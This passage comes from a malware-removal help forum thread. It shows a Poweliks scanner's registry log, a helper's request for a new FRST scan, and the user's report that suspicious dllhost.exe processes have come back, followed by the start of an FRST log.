[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{DBFA3C03-20D5-4EE5-8C06-B8C4C2B71783}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E19F9331-3110-11D4-991C-005004D3B3DB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{F9A1EFBA-6244-42e1-B31F-B20615298617}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{FD10EA6A-0D14-4AA2-A376-0C8D51CA8779}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{0F9285DF-3511-4FE6-A587-CD8F61A121CA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{699A646B-C61E-4C36-A253-620E4EBD294C}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{71FDCAEA-B6F2-4B6C-A18C-6C85F0E4662F}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{C9E37353-EC76-4A58-B575-BBA8B4BD06D1}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}]
[2014.11.07 16:06:35.311] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [ServerExecutable] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing value [ServerExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.07 16:06:35.311] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.07 16:06:35.311] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]...
[2014.11.07 16:06:35.311] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.07 16:06:35.311] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.07 16:06:35.311] - INFO: Win32/Poweliks not found
[2014.11.07 16:07:05.513] - End
The duplicate dllhost.exe *32 processes haven't returned
Good
What TDSSKiller alerted us to were unsigned files, but they belong to legitimate applications.
Sorry you had to make multiple posts, but I knew the logs would be long.
OK, what to do next.
I would like to see a new FRST log including the Addition.txt.
Run FRST
Don't change the checkboxes, just click on Scan.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
Ensure there is a check mark for Addition.txt
Logfiles are created on your desktop.
Post the FRST.txt
- Please also paste that along with the FRST.txt into your reply.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ascot1340
2014-11-08, 00:37
The dllhost.exe *32 processes are now back running in the task manager after a little black window popped up and then closed again (the same as last time).
ascot1340
2014-11-08, 00:51
The FRST logs are below. Should I go ahead and run the OTL tool you recommended a few posts back but I never ran?
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Ryan (administrator) on RYAN-PC on 07-11-2014 17:46:28
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
